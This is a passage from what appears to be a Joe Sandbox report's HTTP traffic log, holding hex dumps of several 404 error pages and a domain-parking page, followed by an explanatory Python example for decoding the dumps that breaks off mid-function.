                    Data Raw: 64 31 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 1d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a2 2f 14 fd 54 40 7e a8 51 fc 50 fe c2 f2 1f f5 dc 3b bb cb 25 45 ca 8f 38 45 05 48 22 67 67 ee dc b9 f7 dc 73 ef cc 6c fd 74 27 74 f5 78 a8 44 4f 0f fc 66 9d fe 0a d7 97 71 dc 28 79 71 4b 76 e4 50 7b 3b aa 24 7c 19 74 1b a5 68 54 42 1f 25 3b cd fa 40 69 29 dc 9e 8c 62 a5 1b a5 f7 2f fd c2 3a 87 67 dc 1a c8 81 6a 94 86 32 ea 7b 41 b7 24 dc 30 d0 2a 40 a7 48 75 a3 91 15 41 e6 6c cf 1d 4f ed 0e c3 48 17 ba ee 7a 1d dd 6b 74 d4 8e e7 2a 8b bf d4 bc c0 d3 9e f4 ad d8 95 be 6a ac 42 84 f6 b4 af 9a bb bb bb f6 00 73 29 3d f4 a5 ab 22 5b 87 c3 ba 63 9e d5 7d 2f e8 8b 48 f9 8d 52 ac c7 be 8a 7b 4a 61 9a 81 ea 78 b2 51 92 be 5f 12 bd 48 6d e7 ca b2 72 96 1c e9 d0 76 e3 18 53 4c c7 7b 58 46 d6 7b 5b 42 af 30 b0 f1 67 7d b5 24 c8 7e 30 d7 40 76 95 73 c5 e2 8e cd 7a ec 46 de 50 37 9d 33 f5 d3 9b 6f 5e 7c fd d2 eb 9b 67 9c 53 bb 5e d0 09 77 6d 1d 49 b7 bf c1 1d de 0e 65 47 34 c4 f6 28 70 b5 17 06 95 ea b5 bd b5 53 ce 99 ad ad e6 19 a7 ee a4 42 52 61 22 0c 7c 74 6f 94 16 8b a9 94 9d 81 0c bc 6d 15 6b fb 72 5c ae 96 d0 5f 45 51 18 3d e5 80 9a 58 c5 98 38 72 1b a5 a2 20 78 25 f3 f2 48 6f b3 97 9f 59 2f 82 0c 1c 47 16 89 9f 5a b7 f9 41 45 fd e6 9e 9d a4 a3 63 f0 da 0e 3b e3 0c d9 6d 6b 08 5f 09 f3 af 45 ee 6b a5 68 e5 36 c6 ed f4 53 ab dd 6d f9 5e b7 a7 81 07 92 a5 a2 a2 1c ee dc 6a a5 0f 48 e4 4c 8b 91 9e 62 be e3 ed 2c 1d 6a 05 a1 26 95 b4 ba 82 89 92 6f 92 a3 e4 51 72 90 3c 16 c9 77 c9 fe e4 23 7c bc 97 1c 4e 3e 9e dc c0 e7 43 fc 1e 25 77 93 7d 7a 7c 77 25 68 c7 c3 b5 3a a2 d1 c4 6d db 22 d4 66 58 ed 69 3d 8c 2f 38 0e 82 cf 46 f8 9a 60 08 c2 ed d0 f7 c3 5d 11 84 e1 50 01 25 f8 80 38 00 5a 54 04 3c cb a8 4b 41 dd 6a 23 ea fb 50 e6 af 34 bb 3d f9 68 72 b3 ee c8 66 dd c1 3a 9a f5 b9 c5 74 55 ab 95 46 ba b5 1b c9 e1 10 42 53 03 cf b7 b7 38 16 5b 88 05 d0 c2 d2 4e ec 96 5e 18 6b 90 88 15 6b a9 3d 17 0e 98 9b 75 c6 d6 56 3a 3f f9 69 75 6a 8d 39 8f 58 4c 0d a5 25 bc d1 5b 6d d6 87 cb c7 76 94 41 31 42 f5 d9 7d 55 6f 47 cd e4 d0 b8 2b f9 81 fc 98 fc c0 be 7d 70 cc 9b 33 26 1f 2e 5b 76 7b a4 75 18 c4 99 bd b1 ee 02 08 cc 43 68 69 3e c0 09 7e 18 b5 d8 cb 2a 70 09 6a e9 83 d8 bb aa 5a f0 ff 40 fa ec 8c d4 a6 f9 f8 dc 7e 69 7f 76 0c 38 b9 20 62 28 3b 1d b8 a9 e5 13 72 e6 91 47 04 6d d0 e7 ec f6 42 2f 76 d6 dd 9e 72 fb 8d 95 0e 27 8a 45 fc bd 22 07 c3 35 8c 69 c5 e1 28 72 55 23 53 81 98 b9 d4 fc 35 49 21 24 8a e2 7a 29 70 8a fa 33 75 17 e2 f1 e4 f5 74 c2 81 f4 72 82 cf 82 a6 a0 ba e9 e0 04 6a d7 59 1f e9 41 a6 d9 42 ed e9 39 e5 98 d1 20 d3 7c 85 9a 5c ac 4a 7a dd a0 11 c3 50 41 a7 05 59 27 2f 34 f9 3b 80 f1 9f e4 40 4c 3e 4d 8e 26 9f 4d 6e 8a e4 7e c6 0b a7 0b a1 18 0f 65 b0 00 b
                Source: global traffic | HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Wed, 13 Nov 2024 08:27:19 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    Content-Encoding: gzip
                    Data Raw: 64 31 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 97 dd 1d 4a a6 6d 01 89 9d 34 09 62 c4 68 1a a0 40 d0 a2 2f 14 fd 54 40 7e a8 51 fc 50 fe c2 f2 1f f5 dc 3b bb cb 25 45 ca 8f 38 45 05 48 22 67 67 ee dc b9 f7 dc 73 ef cc 6c fd 74 27 74 f5 78 a8 44 4f 0f fc 66 9d fe 0a d7 97 71 dc 28 79 71 4b 76 e4 50 7b 3b aa 24 7c 19 74 1b a5 68 54 42 1f 25 3b cd fa 40 69 29 dc 9e 8c 62 a5 1b a5 f7 2f fd c2 3a 87 67 dc 1a c8 81 6a 94 86 32 ea 7b 41 b7 24 dc 30 d0 2a 40 a7 48 75 a3 91 15 41 e6 6c cf 1d 4f ed 0e c3 48 17 ba ee 7a 1d dd 6b 74 d4 8e e7 2a 8b bf d4 bc c0 d3 9e f4 ad d8 95 be 6a ac 42 84 f6 b4 af 9a bb bb bb f6 00 73 29 3d f4 a5 ab 22 5b 87 c3 ba 63 9e d5 7d 2f e8 8b 48 f9 8d 52 ac c7 be 8a 7b 4a 61 9a 81 ea 78 b2 51 92 be 5f 12 bd 48 6d e7 ca b2 72 96 1c e9 d0 76 e3 18 53 4c c7 7b 58 46 d6 7b 5b 42 af 30 b0 f1 67 7d b5 24 c8 7e 30 d7 40 76 95 73 c5 e2 8e cd 7a ec 46 de 50 37 9d 33 f5 d3 9b 6f 5e 7c fd d2 eb 9b 67 9c 53 bb 5e d0 09 77 6d 1d 49 b7 bf c1 1d de 0e 65 47 34 c4 f6 28 70 b5 17 06 95 ea b5 bd b5 53 ce 99 ad ad e6 19 a7 ee a4 42 52 61 22 0c 7c 74 6f 94 16 8b a9 94 9d 81 0c bc 6d 15 6b fb 72 5c ae 96 d0 5f 45 51 18 3d e5 80 9a 58 c5 98 38 72 1b a5 a2 20 78 25 f3 f2 48 6f b3 97 9f 59 2f 82 0c 1c 47 16 89 9f 5a b7 f9 41 45 fd e6 9e 9d a4 a3 63 f0 da 0e 3b e3 0c d9 6d 6b 08 5f 09 f3 af 45 ee 6b a5 68 e5 36 c6 ed f4 53 ab dd 6d f9 5e b7 a7 81 07 92 a5 a2 a2 1c ee dc 6a a5 0f 48 e4 4c 8b 91 9e 62 be e3 ed 2c 1d 6a 05 a1 26 95 b4 ba 82 89 92 6f 92 a3 e4 51 72 90 3c 16 c9 77 c9 fe e4 23 7c bc 97 1c 4e 3e 9e dc c0 e7 43 fc 1e 25 77 93 7d 7a 7c 77 25 68 c7 c3 b5 3a a2 d1 c4 6d db 22 d4 66 58 ed 69 3d 8c 2f 38 0e 82 cf 46 f8 9a 60 08 c2 ed d0 f7 c3 5d 11 84 e1 50 01 25 f8 80 38 00 5a 54 04 3c cb a8 4b 41 dd 6a 23 ea fb 50 e6 af 34 bb 3d f9 68 72 b3 ee c8 66 dd c1 3a 9a f5 b9 c5 74 55 ab 95 46 ba b5 1b c9 e1 10 42 53 03 cf b7 b7 38 16 5b 88 05 d0 c2 d2 4e ec 96 5e 18 6b 90 88 15 6b a9 3d 17 0e 98 9b 75 c6 d6 56 3a 3f f9 69 75 6a 8d 39 8f 58 4c 0d a5 25 bc d1 5b 6d d6 87 cb c7 76 94 41 31 42 f5 d9 7d 55 6f 47 cd e4 d0 b8 2b f9 81 fc 98 fc c0 be 7d 70 cc 9b 33 26 1f 2e 5b 76 7b a4 75 18 c4 99 bd b1 ee 02 08 cc 43 68 69 3e c0 09 7e 18 b5 d8 cb 2a 70 09 6a e9 83 d8 bb aa 5a f0 ff 40 fa ec 8c d4 a6 f9 f8 dc 7e 69 7f 76 0c 38 b9 20 62 28 3b 1d b8 a9 e5 13 72 e6 91 47 04 6d d0 e7 ec f6 42 2f 76 d6 dd 9e 72 fb 8d 95 0e 27 8a 45 fc bd 22 07 c3 35 8c 69 c5 e1 28 72 55 23 53 81 98 b9 d4 fc 35 49 21 24 8a e2 7a 29 70 8a fa 33 75 17 e2 f1 e4 f5 74 c2 81 f4 72 82 cf 82 a6 a0 ba e9 e0 04 6a d7 59 1f e9 41 a6 d9 42 ed e9 39 e5 98 d1 20 d3 7c 85 9a 5c ac 4a 7a dd a0 11 c3 50 41 a7 05 59 27 2f 34 f9 3b 80 f1 9f e4 40 4c 3e 4d 8e 26 9f 4d 6e 8a e4 7e c6 0b a7 0b a1 18 0f 65 b0 00 b
                Source: global traffic | HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Server: nginx
                    Date: Wed, 13 Nov 2024 08:27:21 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    Data Raw: 32 34 66 63 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 69 73 5f 61 64 61 70 74 69 76 65 22 20 6c 61 6e 67 3d 22 72 75 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 70 61 72 6b 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 72 65 67 72 75 2d 72 64 61 70 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 77 77 77 2e 6d 61 72 6b 65 74 70 6c 61 63 65 72 2e 74 6f 70 3c 2f 74 69 74 6c 65 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 6d 65 64 69 61 3d 22 61 6c 6c 22 20 68 72 65 66 3d 22 70 61 72 6b 69 6e 67 2d 72 64 61 70 2d 61 75 74 6f 2e 63 73 73 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 66 61 76 69 63 6f 6e 2e 69 63 6f 3f 31 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 3c 73 63 72 69 70 74 3e 2f 2a 3c 21 5b 43 44 41 54 41 5b 2a 2f 0a 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 0a 2f 2a 5d 5d 3e 2a 2f 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 6d 61 6e 69 66 65 73 74 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 20 6f 6e 6c 6f 61 64 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 29 22 20 6f 6e 65 72 72 6f 72 3d 22 77 69 6e 64 6f 77 2e 74 72 61 63 6b 53 63 72 69 70 74 4c 6f 61 64 28 27 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 27 2c 20 31 29 22 20 73 72 63 3d 22 2f 68 65 61 64 2d 73 63 72 69 70 74 73 2e 6a 73 22 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 62 2d 70 61 67 65 20 62 2d 70 61 67 65 5f 74 79 70 65 5f 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 20 62 2d 70 61 72 6b 69 6e 67 5f 62 67 5f 6c 69 67 68 74 22 3e 3c 68 65 61 64 65 72 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 20 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 5f 74 79 70 65 5f 72 64 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 2d 70 61 72 6b 69 6e 67 5f 5f 68 65 61 64 65 72 2d 6e 6f 74 65 20 62 2d 74 65 78 74 22 3e d0 94 d0 be d0 bc d0 b5 d0 bd 20 d0 b7 d0 b0 d1 80 d0 b5 d0 b3 d
                Source: global traffic | HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Date: Wed, 13 Nov 2024 08:27:55 GMT
                    Server: Apache
                    Content-Length: 389
                    Connection: close
                    Content-Type: text/html
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Date: Wed, 13 Nov 2024 08:27:58 GMT
                    Server: Apache
                    Content-Length: 389
                    Connection: close
                    Content-Type: text/html
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Date: Wed, 13 Nov 2024 08:28:00 GMT
                    Server: Apache
                    Content-Length: 389
                    Connection: close
                    Content-Type: text/html
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Date: Wed, 13 Nov 2024 08:28:00 GMT
                    Server: Apache
                    Content-Length: 389
                    Connection: close
                    Content-Type: text/html
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic | HTTP traffic detected:
                    HTTP/1.1 404 Not Found
                    Date: Wed, 13 Nov 2024 08:28:03 GMT
                    Server: Apache
                    Content-Length: 389
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
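The "Data Raw" hex dumps above are the only complete copy of several response bodies: the nginx entries carry no "Data Ascii" at all, and where an ASCII rendering exists it drops control characters (the Apache body reads "404 Not Founderror" in Data Ascii but has a newline between the two words in the hex). The Python below is an added example, not Joe Sandbox code: it parses a dump back into bytes, removes the `Transfer-Encoding: chunked` framing, inflates gzip content even when the dump is cut off, and lets you check the result against `Content-Length`. `APACHE_404_RAW` is copied in full from the Apache 404 entries above; `NGINX_404_RAW_PREFIX` is the first 40 bytes of the nginx chunked gzip entries, enough to read the chunk size (0xd1c, larger than the dump, so the dump is truncated) and the gzip header. The function names and the constructed input built by `chunked_gzip_dump()` are this example's own.

```python
"""Turn the "Data Raw" hex dumps of a Joe Sandbox report back into response bytes.

Added example for this report (not Joe Sandbox code). APACHE_404_RAW is copied
in full from the Apache 404 entries; NGINX_404_RAW_PREFIX is the first 40 bytes
of the nginx entries. chunked_gzip_dump() builds constructed test input.
"""
import binascii
import gzip
import zlib

APACHE_404_RAW = (
    "3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a "
    "3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a "
    "3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a "
    "3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a "
    "3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a "
    "65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e"
)
# "d1c\r\n" chunk-size line, then the gzip member header (1f 8b 08 ...) and the first deflate bytes.
NGINX_404_RAW_PREFIX = ("64 31 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b "
                        "c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38")


def hex_dump_to_bytes(dump):
    """Parse a space-separated hex dump; a dangling half byte at the end (the report cuts dumps mid-token) is dropped."""
    tokens = dump.split()
    if tokens and len(tokens[-1]) != 2:
        tokens.pop()
    return binascii.unhexlify("".join(tokens))


def declared_chunk_size(body):
    """Size announced by the first chunk-size line of a chunked body, or None if there is none."""
    end = body.find(b"\r\n")
    if end < 0:
        return None
    try:
        return int(body[:end].split(b";")[0].strip(), 16)
    except ValueError:
        return None


def dechunk(body):
    """Reassemble the payload of a Transfer-Encoding: chunked body, stopping cleanly if the dump ends inside a chunk."""
    out = bytearray()
    pos = 0
    while True:
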